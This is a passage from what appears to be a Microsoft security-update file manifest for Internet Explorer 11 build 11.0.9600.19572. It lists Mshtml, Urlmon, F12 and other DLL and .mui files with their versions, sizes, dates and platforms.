Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:11| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:12| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:13| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:13| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:14| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:15| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:16| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:17| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:18| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:18| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:19| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:20| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:21| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:22| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:23| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:23| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:25| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:25| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:26| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 307,200| 23-Nov-2019| 06:58| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 293,888| 23-Nov-2019| 06:59| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,304| 23-Nov-2019| 07:00| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 289,280| 23-Nov-2019| 07:01| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 299,008| 23-Nov-2019| 07:01| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 303,104| 23-Nov-2019| 07:02| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 282,112| 23-Nov-2019| 08:22| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 296,960| 23-Nov-2019| 07:03| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 283,648| 23-Nov-2019| 07:04| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 291,840| 23-Nov-2019| 07:05| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 299,520| 23-Nov-2019| 07:06| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 275,968| 23-Nov-2019| 07:06| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 23-Nov-2019| 07:07| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 293,376| 23-Nov-2019| 07:08| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 296,960| 23-Nov-2019| 07:09| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 258,048| 23-Nov-2019| 07:10| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 256,512| 23-Nov-2019| 07:11| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 289,280| 23-Nov-2019| 07:11| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 288,256| 23-Nov-2019| 07:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 285,184| 23-Nov-2019| 07:13| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 295,424| 23-Nov-2019| 07:14| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 297,472| 23-Nov-2019| 07:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,864| 23-Nov-2019| 07:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 295,424| 23-Nov-2019| 07:17| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 294,400| 23-Nov-2019| 07:17| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 294,400| 23-Nov-2019| 07:18| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,864| 23-Nov-2019| 07:19| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 23-Nov-2019| 07:20| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 288,768| 23-Nov-2019| 07:20| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 286,208| 23-Nov-2019| 07:21| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 281,600| 23-Nov-2019| 07:22| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 286,720| 23-Nov-2019| 07:23| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,352| 23-Nov-2019| 07:23| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 242,176| 23-Nov-2019| 07:24| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 243,200| 23-Nov-2019| 07:25| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 243,200| 23-Nov-2019| 07:26| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 61,440| 23-Nov-2019| 06:58| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 73,728| 23-Nov-2019| 06:59| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 67,584| 23-Nov-2019| 07:00| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 67,584| 23-Nov-2019| 07:00| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 74,240| 23-Nov-2019| 07:01| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 78,848| 23-Nov-2019| 07:02| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 61,440| 23-Nov-2019| 08:22| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 74,752| 23-Nov-2019| 07:04| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 62,464| 23-Nov-2019| 07:04| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,096| 23-Nov-2019| 07:05| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 75,264| 23-Nov-2019| 07:05| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 61,440| 23-Nov-2019| 07:06| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,608| 23-Nov-2019| 07:08| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 72,192| 23-Nov-2019| 07:08| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 73,216| 23-Nov-2019| 07:09| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 41,472| 23-Nov-2019| 07:09| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 37,888| 23-Nov-2019| 07:10| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,608| 23-Nov-2019| 07:11| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 67,584| 23-Nov-2019| 07:12| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 65,536| 23-Nov-2019| 07:13| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 74,240| 23-Nov-2019| 07:13| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 70,656| 23-Nov-2019| 07:14| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 71,168| 23-Nov-2019| 07:15| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 71,680| 23-Nov-2019| 07:17| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 71,168| 23-Nov-2019| 07:17| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 69,632| 23-Nov-2019| 07:18| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,096| 23-Nov-2019| 07:19| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,608| 23-Nov-2019| 07:20| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,096| 23-Nov-2019| 07:20| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 65,536| 23-Nov-2019| 07:21| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 59,904| 23-Nov-2019| 07:22| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 65,536| 23-Nov-2019| 07:23| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 69,120| 23-Nov-2019| 07:23| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:24| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:25| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:26| Not applicable \nJavascriptcollectionagent.dll| 11.0.9600.19572| 60,416| 19-Nov-2019| 07:36| x86 \nDiagnosticshub.scriptedsandboxplugin.dll| 11.0.9600.19572| 230,400| 19-Nov-2019| 07:38| x86 \nUrlmon.dll.mui| 11.0.9600.19572| 46,080| 23-Nov-2019| 06:58| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 06:59| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 07:00| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 07:00| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 07:01| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 07:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 08:22| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 07:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:05| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 07:05| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 45,056| 23-Nov-2019| 07:06| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:08| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 07:09| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 39,936| 23-Nov-2019| 07:10| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 07:11| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 07:11| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 07:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 07:13| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 07:14| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 07:14| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 07:15| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:16| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:17| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 07:18| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 07:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 07:20| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 07:21| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 07:22| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:23| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 07:23| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:24| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:25| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:26| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 06:58| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 06:59| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:00| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 07:00| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:01| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 11,264| 23-Nov-2019| 07:02| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 08:22| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:03| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:04| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:05| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:06| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,216| 23-Nov-2019| 07:06| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:08| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:08| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:09| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 7,680| 23-Nov-2019| 07:09| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 7,680| 23-Nov-2019| 07:10| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:11| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:12| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 07:13| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:14| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:15| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:16| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:16| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:17| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:18| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:19| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:19| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:20| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 07:21| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 07:22| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:23| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:24| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 6,656| 23-Nov-2019| 07:24| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 6,656| 23-Nov-2019| 07:25| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 6,656| 23-Nov-2019| 07:26| Not applicable \nJsproxy.dll| 11.0.9600.19572| 47,104| 19-Nov-2019| 07:53| x86 \nWininet.dll| 11.0.9600.19572| 4,387,840| 19-Nov-2019| 07:05| x86 \nInetcpl.cpl.mui| 11.0.9600.19572| 114,176| 23-Nov-2019| 06:58| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,560| 23-Nov-2019| 06:59| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,928| 23-Nov-2019| 07:00| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 122,880| 23-Nov-2019| 07:00| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,048| 23-Nov-2019| 07:01| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 138,240| 23-Nov-2019| 07:02| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 114,688| 23-Nov-2019| 08:22| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 131,584| 23-Nov-2019| 07:03| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 117,760| 23-Nov-2019| 07:04| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 122,368| 23-Nov-2019| 07:05| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 134,144| 23-Nov-2019| 07:05| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 107,008| 23-Nov-2019| 07:06| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,392| 23-Nov-2019| 07:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 127,488| 23-Nov-2019| 07:08| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 128,512| 23-Nov-2019| 07:09| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 88,576| 23-Nov-2019| 07:10| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 82,944| 23-Nov-2019| 07:11| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 125,440| 23-Nov-2019| 07:11| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,392| 23-Nov-2019| 07:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 120,320| 23-Nov-2019| 07:13| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,560| 23-Nov-2019| 07:13| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 129,024| 23-Nov-2019| 07:14| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 125,952| 23-Nov-2019| 07:15| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 129,024| 23-Nov-2019| 07:16| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 128,000| 23-Nov-2019| 07:17| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,904| 23-Nov-2019| 07:18| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 129,024| 23-Nov-2019| 07:19| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,904| 23-Nov-2019| 07:19| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,416| 23-Nov-2019| 07:20| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 121,856| 23-Nov-2019| 07:21| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 115,712| 23-Nov-2019| 07:22| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,904| 23-Nov-2019| 07:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 125,440| 23-Nov-2019| 07:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 72,704| 23-Nov-2019| 07:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 73,728| 23-Nov-2019| 07:25| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 73,728| 23-Nov-2019| 07:26| Not applicable \nIedkcs32.dll| 18.0.9600.19572| 341,896| 23-Nov-2019| 06:57| x86 \nInstall.ins| Not applicable| 464| 19-Nov-2019| 05:36| Not applicable \nIeapfltr.dat| 10.0.9301.0| 616,104| 23-Sep-2018| 13:18| Not applicable \nIeapfltr.dll| 11.0.9600.19572| 710,144| 19-Nov-2019| 07:00| x86 \nTdc.ocx| 11.0.9600.19572| 73,216| 19-Nov-2019| 07:36| x86 \nDiagnosticshub.datawarehouse.dll| 11.0.9600.19572| 489,472| 19-Nov-2019| 08:02| x86 \nIedvtool.dll| 11.0.9600.19572| 772,608| 19-Nov-2019| 08:17| x86 \nDiagnosticshub_is.dll| 11.0.9600.19572| 38,400| 19-Nov-2019| 08:04| x86 \nDxtmsft.dll| 11.0.9600.19572| 416,256| 19-Nov-2019| 07:40| x86 \nDxtrans.dll| 11.0.9600.19572| 279,040| 19-Nov-2019| 07:31| x86 \nMicrosoft-windows-ie-f12-provider.ptxml| Not applicable| 11,892| 19-Nov-2019| 05:34| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 06:58| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 06:59| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:00| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:00| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:01| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:02| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:22| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:03| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:04| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:05| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:05| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:06| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:07| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:08| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:09| Not applicable \nF12.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:10| Not applicable \nF12.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:10| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:11| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:12| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:13| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:13| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:14| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:15| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:17| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:17| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:18| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:19| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:20| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:20| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:21| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:22| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:23| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:23| Not applicable \nF12.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:24| Not applicable \nF12.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:25| Not applicable \nF12.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:26| Not applicable \nDiagnosticstap.dll| 11.0.9600.19572| 174,592| 19-Nov-2019| 07:40| x86 \nF12resources.dll| 11.0.9600.19572| 10,948,096| 19-Nov-2019| 08:06| x86 \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 06:58| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 06:59| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:00| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:00| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:01| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:02| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:22| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:03| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:04| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:05| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:05| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:06| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:08| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:08| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:09| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:10| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:10| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:11| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:12| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:13| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:13| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:14| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:15| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:16| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:17| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:18| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:19| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:20| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:21| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:21| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:22| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:23| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:23| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:24| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:25| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:26| Not applicable \nF12tools.dll| 11.0.9600.19572| 255,488| 19-Nov-2019| 07:39| x86 \nF12.dll| 11.0.9600.19572| 1,206,272| 19-Nov-2019| 07:29| x86 \nMsfeeds.dll| 11.0.9600.19572| 696,320| 19-Nov-2019| 07:23| x86 \nMsfeeds.mof| Not applicable| 1,518| 19-Nov-2019| 05:44| Not applicable \nHtml.iec| 2019.0.0.19572| 341,504| 19-Nov-2019| 07:58| Not applicable \nMshtmled.dll| 11.0.9600.19572| 76,288| 19-Nov-2019| 07:33| x86 \nMshtmlmedia.dll| 11.0.9600.19572| 1,155,072| 19-Nov-2019| 07:22| x86 \nMicrosoft-windows-ie-htmlrendering.ptxml| Not applicable| 3,228| 19-Nov-2019| 05:34| Not applicable \nMshtml.dll| 11.0.9600.19572| 20,290,048| 19-Nov-2019| 08:17| x86 \nMshtml.tlb| 11.0.9600.19572| 2,724,864| 19-Nov-2019| 08:11| Not applicable \nIeetwcollector.exe| 11.0.9600.19572| 104,960| 19-Nov-2019| 07:49| x86 \nIeetwcollectorres.dll| 11.0.9600.19572| 4,096| 19-Nov-2019| 08:11| x86 \nIeetwproxystub.dll| 11.0.9600.19572| 47,616| 19-Nov-2019| 07:58| x86 \nIelowutil.exe| 11.0.9600.19572| 221,184| 19-Nov-2019| 07:51| x86 \nIeproxy.dll| 11.0.9600.19572| 301,056| 19-Nov-2019| 06:57| x86 \nIeshims.dll| 11.0.9600.19572| 290,304| 19-Nov-2019| 07:02| x86 \nBing.ico| Not applicable| 5,430| 23-Sep-2018| 13:33| Not applicable \nIeunatt.exe| 11.0.9600.19572| 115,712| 19-Nov-2019| 